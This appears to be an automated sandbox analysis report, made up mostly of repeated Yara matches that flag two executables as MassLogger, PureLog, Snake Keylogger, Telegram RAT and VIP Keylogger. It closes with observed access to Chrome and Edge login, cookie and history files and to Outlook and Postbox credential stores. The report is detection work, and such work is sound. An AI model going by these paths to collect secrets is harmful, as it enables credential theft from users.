                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 7852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 3000, type: MEMORYSTR
                      Yara detected MassLogger RAT
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 7852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 3000, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Snake Keylogger
                      Source: Yara matchFile source: 00000013.00000002.3626598913.0000000002531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3625599331.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_snake01.exe.5e03c0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.4a50000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c1216.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.5100000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.5100000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70f20.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_snake01.exe.5e03c0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c02f6.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70f20.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc02f6.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc1216.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc1216.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0f20.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c02f6.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0f20.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc02f6.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c1216.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 7852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_snake01.exe PID: 7944, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 3000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_snake01.exe PID: 2524, type: MEMORYSTR
                      Yara detected VIP Keylogger
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_snake01.exe.5e03c0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.4a50000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c1216.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.5100000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.5100000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70f20.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_snake01.exe.5e03c0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c02f6.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70f20.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc02f6.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc1216.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc1216.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0f20.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c02f6.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0f20.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc02f6.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c1216.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.3625599331.00000000025C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3626598913.000000000263C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_snake01.exe PID: 7944, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_snake01.exe PID: 2524, type: MEMORYSTR
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPE
